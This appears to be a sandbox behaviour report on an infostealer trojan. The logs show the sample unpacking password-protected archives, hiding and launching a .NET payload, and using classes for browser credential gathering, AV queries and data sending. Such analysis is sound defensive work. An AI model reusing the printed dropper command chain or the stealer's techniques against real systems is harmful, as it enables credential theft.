                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: SecurityJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: String function: 004029A6 appears 44 times
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exeStatic PE information: invalid certificate
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe, 00000000.00000003.1998794706.00000000027D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe, 00000000.00000003.1998794706.00000000027D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: XFileVersionFileDescriptionOriginalFilename: _winzip_.rsrcCOFF_SYMBOLSCERTIFICATE vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe, 00000000.00000003.1998794706.00000000027D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename7z.dll, vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe, 00000000.00000003.1998563092.0000000006A10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename7z.exe, vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe, 00000000.00000003.1998563092.0000000006A10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe, 00000000.00000003.1998563092.0000000006A10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: XFileVersionFileDescriptionOriginalFilename: _winzip_.rsrcCOFF_SYMBOLSCERTIFICATE vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe, 00000000.00000003.1998563092.0000000006A10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename7z.dll, vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe, 00000000.00000002.3222046683.0000000000423000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStatPlus6.exe0 vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exe, 00000000.00000003.2003623399.0000000002550000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename7z.exe, vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exeBinary or memory string: OriginalFilenameStatPlus6.exe0 vs jjjUC5ggb2nQMb1B6SvBkwmT.exe
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: in.exe.9.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: in.exe.9.dr, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
                        Source: in.exe.9.dr, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
                        Source: in.exe.9.dr, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
                        Source: in.exe.9.dr, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/22@0/1
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_00409606 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00409606
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0045AC74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,5_2_0045AC74
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_00461D04 GetCurrentProcess,CloseHandle,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,FindCloseChangeNotification,5_2_00461D04
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_0040122A GetDiskFreeSpaceExW,SendMessageW,0_2_0040122A
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_004092C1 GetDlgItem,GetDlgItem,SendMessageW,GetDlgItem,GetWindowLongW,GetDlgItem,SetWindowLongW,GetSystemMenu,EnableMenuItem,GetDlgItem,SetFocus,SetTimer,CoCreateInstance,GetDlgItem,IsWindow,GetDlgItem,EnableWindow,GetDlgItem,ShowWindow,0_2_004092C1
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_004020BF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_004020BF
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_03
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeFile created: C:\Users\user\AppData\Local\Temp\mainJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002DEA000.00000004.00000800.00020000.00000000.sdmp, in.exe, 0000000B.00000002.2139768224.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, in.exe, 0000000B.00000002.2139768224.0000000002CDA000.00000004.00000800.00020000.00000000.sdmp, in.exe, 0000000B.00000002.2139768224.0000000002D6D000.00000004.00000800.00020000.00000000.sdmp, in.exe, 0000000B.00000002.2139768224.0000000002D57000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeFile read: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe "C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe"
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p324051139125346723019431074 -oextracted
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p324051139125346723019431074 -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\mode.comSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\System32\mode.comSection loaded: ureg.dllJump to behavior
                        Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: esdsip.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Google Chrome.lnk.11.drLNK file: ..\..\..\Program Files\Google\Chrome\Application\chrome.exe
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exeStatic file information: File size 3221440 > 1048576

                        Data Obfuscation

                        barindex
                        Source: in.exe.9.dr, EwV3ECxYhIse1SOarW.cs.Net Code: Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.l5dizeUqZ0(16777436)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.l5dizeUqZ0(16777258)),Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.l5dizeUqZ0(16777301))})
                        Source: in.exe.9.drStatic PE information: 0x86B99492 [Fri Aug 16 23:38:58 2041 UTC]
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_00402665
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_004192C0 push eax; ret 0_2_004192EE
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0047676A push rcx; ret 5_2_0047676B
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_00E550BD push es; ret 11_2_00E550C4
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_04E7066C push ss; retf 11_2_04E70670
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_04E7BBC8 push esp; iretd 11_2_04E7BBC9
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_05101063 push edx; retf 11_2_05101064
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_06461015 push FFFFFF8Bh; ret 11_2_0646101A
                        Source: in.exe.9.drStatic PE information: section name: .text entropy: 7.362711891972509
                        Source: in.exe.9.dr, AesFastEngine.csHigh entropy of concatenated method names: 'Shift', 'FFmulX', 'Inv_Mcol', 'SubWord', 'GenerateWorkingKey', 'Init', 'GetBlockSize', 'ProcessBlock', 'Reset', 'UnPackBlock'
                        Source: in.exe.9.dr, UserExt.csHigh entropy of concatenated method names: 'DomainExists', 'PreCheck', 'NMdP6dBfO1y9yPTTP8B', 'BtlJSiBygSArVP8byYT', 'cwdr4PBqWm76X1Ogxmk', 'xred9VBNW4LbnxifewC', 'gMhma0B8osGVhSgiI37', 'iQuLndBU3ZMWkguQXvv', 'fW8giDBFGBjRdaCcHIS', 'iqiYoABwEWA6IFP67Oh'
                        Source: in.exe.9.dr, Tables8kGcmMultiplier.csHigh entropy of concatenated method names: 'Init', 'MultiplyH', 'za2eNGNJbXAumtCuKjH', 'G9wbwnNPgu2BQG4WyDP', 'CsuiZANonfen0rHLVUw', 'I61A4cN3yxqJBkue3WH', 'rHILQwNIxhBAKGBBEbQ', 'p7K6XUNWWSFhEDOBxHX', 'sGYT5aNmLtHSa0ZgerX', 'dwhXjINKiJ8klN8rMMw'
                        Source: in.exe.9.dr, StringDecrypt.csHigh entropy of concatenated method names: 'Xor', 'FromBase64', 'BytesToStringConverted', 'Read', 'Ka3Fj2UkunFubTyvnJ4', 'TLeCP0U7yaFCIiJmdHl', 'XZPBnVUp94Cp8l38WdG', 'lS6pT6UvS8c7PqKQeAO', 'ToAP8JUaWdoSUMoUlkA', 'dmItCsUQYBDWryXBYg9'
                        Source: in.exe.9.dr, Form1.csHigh entropy of concatenated method names: 'Dispose', 'InitializeComponent', 'U1CnBHVq8tbcYFCfkfo', 'sXEZgmVfLKMJUvoo6b4', 'b2l7gWVN8xps47gifdW', 'o1SOOUXzhcAjdQAVrm3', 'OhktNRVyVbitLdJOOuC', 'G12RTAV8hPd41iaH7Sx', 'IVd6fkVUGYTiZ11arAh', 'KkSe07VFmO5nmRCGdNQ'
                        Source: in.exe.9.dr, FullInfoSender.csHigh entropy of concatenated method names: 'Invoker', 'sdfk8h34', 'Visible', 'asdk9y3', 'kadsoji83', 'kkdhfakdasd', 'sdfm83kjasd', 'sdfkas83', 'gkdsi8y234', 'sf34asd21'
                        Source: in.exe.9.dr, AesGcm256.csHigh entropy of concatenated method names: 'Decrypt', 'yFaLd9UfoLpPPR6N82Z', 'bhCFK0UNSl6DhLc6nQ8', 'omkA3TU8r8r1ZTprlmk', 'qXWZJIUUDMwW2JXjiAA', 'Yy8NnSUF2tmloe9ArN7', 'Bl5BmhUw0JvgY2OKFm2', 'gSC2qHUXj9etiIOBOOi', 'ginPl1Uy6tPU5lOsjfq', 'PHmyqfUqy86dCcYPhax'
                        Source: in.exe.9.dr, PartsSender.csHigh entropy of concatenated method names: 'Invoker', 'sdf9j3nasd', 'Visible', 'LSIDsd2', 'asdkadu8', 'sdfo8n234', 'sdfi35sdf', 'asd44123', 'fdfg9i3jn4', 'sdf934asd'
                        Source: in.exe.9.dr, EnvironmentChecker.csHigh entropy of concatenated method names: 'Check', 'FindLinksAndSetProxy', 'InstallCert', 'qPCgxiB2oUhfRZfgBu7', 'uFeXq0B9BPbYEuYtrmx', 'OcpwLUB6BEfIGmgpwWT', 'VKV512BjPGvJIIiHeQB', 'VaC24NBQVDwauM6G1kt', 'WxGJt1BZHadkXE9MPJl', 'o4rWnEBkrvG12vVZSGb'
                        Source: in.exe.9.dr, QueryProcessor.csHigh entropy of concatenated method names: 'GatherValue', 'ReadMasterOfContext', 'ReadContextTable', 'GetOffset', 'ReadContextValue', 'ConvertToULong', 'Count', 'Gvl', 'Cvl', 'IsOdd'
                        Source: in.exe.9.dr, BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO.csHigh entropy of concatenated method names: 'Dispose', 'aIBB0j2e9yddmSm0Quc', 'HBZATj22hFg4nV4xYKR', 'AlZxPX29FvQv9ChqCMR', 'X6Xd0D261MKEwe6vB01', 'fQltEe2juNTAdAD4xTW', 'SE9LaP2Qb47E0O6PnG7', 'k6yH212CuSuxLQ4iVR3', 'fRePJP2BBhsfiGmdPjL', 'hsmXsS2Zk3guPmdXfFI'
                        Source: in.exe.9.dr, Json.csHigh entropy of concatenated method names: 'FromJSON', 'ToJSON', 'GAIIkZCAprOdmZGt07D', 'H31rLiC5bq8mnqGTmeK', 'txrsWACtq970qQTbSwR', 'zWjqFpC48PU51FXZDgN', 'cLldBOCd371NPb4AE6Y', 'tZNFewCH7vkCZON022Y', 'jUxbJSCIR98D5xTT7g9'
                        Source: in.exe.9.dr, GcmBlockCipher.csHigh entropy of concatenated method names: 'GetBlockSize', 'Init', 'GetMac', 'GetOutputSize', 'GetUpdateOutputSize', 'ProcessByte', 'ProcessBytes', 'Process', 'DoFinal', 'Reset'
                        Source: in.exe.9.dr, FileExt.csHigh entropy of concatenated method names: 'ReadFile', 'ReadFileAsText', 'hhavFtCrI2Pj5dUY462', 'WRq9A7Clkmx1c6MBeya', 'aGxKgyCSjkZJT5vB6s4', 'R6PTv5CibwL0NFKTJ06', 'oP5xOKCLo7WviKOgwxr', 'Pmp9FOCGQsqAwF6tDQ5', 'RlptJ1ChFxAUh2tqXMx', 'OOQOSwCMY8cXaRgdwbu'
                        Source: in.exe.9.dr, SystemInfoHelper.csHigh entropy of concatenated method names: 'CloseBrowser', 'GetProcessors', 'GetGraphicCards', 'GetBrowsers', 'GetSerialNumber', 'QueryProc', 'QueryAV', 'QueryProc', 'ListOfPrograms', 'AvailableLanguages'
                        Source: in.exe.9.dr, GcmUtilities.csHigh entropy of concatenated method names: 'OneAsBytes', 'OneAsUints', 'AsUints', 'Multiply', 'MultiplyP', 'MultiplyP8', 'ShiftRight', 'ShiftRight', 'ShiftRightN', 'Xor'
                        Source: in.exe.9.dr, IPv4Helper.csHigh entropy of concatenated method names: 'IsLocalIp', 'GetDefaultIPv4Address', 'Request', 'v4snoYBo1Zns3PeQv7Y', 'Y7fjQ0BJ2MomcSeHpJU', 'IMfaHOBPUT9Eb0QXioX', 'vmIEC5B31mQZ2eYCtT8', 'SGmC8oBmjCbSDwYpOlQ', 'ICfO3CBKGH2SrtUSSEn', 'EkLjq9BbSTEYEyuK15h'
                        Source: in.exe.9.dr, Entity19.csHigh entropy of concatenated method names: 'Id1', 'Id2', 'Id3', 'e2NL75fVDe6gGM94P22', 'DsGiAhfCKPq6I24qD59', 'eFBqLGfB9QCLL11eCjg', 'YuAbj8fe7lDlGfAWnmF', 'eanD1af2Bw2RSuv6oOt', 'dRkZ6Bf93LwSBOvLJML', 'jwgNC6f6G4PQln9eQCi'
                        Source: in.exe.9.dr, QueryCmd.csHigh entropy of concatenated method names: 'IsTrue', 'Query', 'nD7n6GV5839C33pU3PP', 'WLC1ycVdgU1xIjt2mfs', 'IKTkBeVHTBO909oOp4p', 'JZONa9VIjqZvm0TslPo', 'rrR9PoVWXeF8CZ9Rc54', 'xebPdDVJaPqCH2oYNSB', 'JMedFpVPgjdfy40mYhV', 'hkPoisVooEcf8FUJA26'
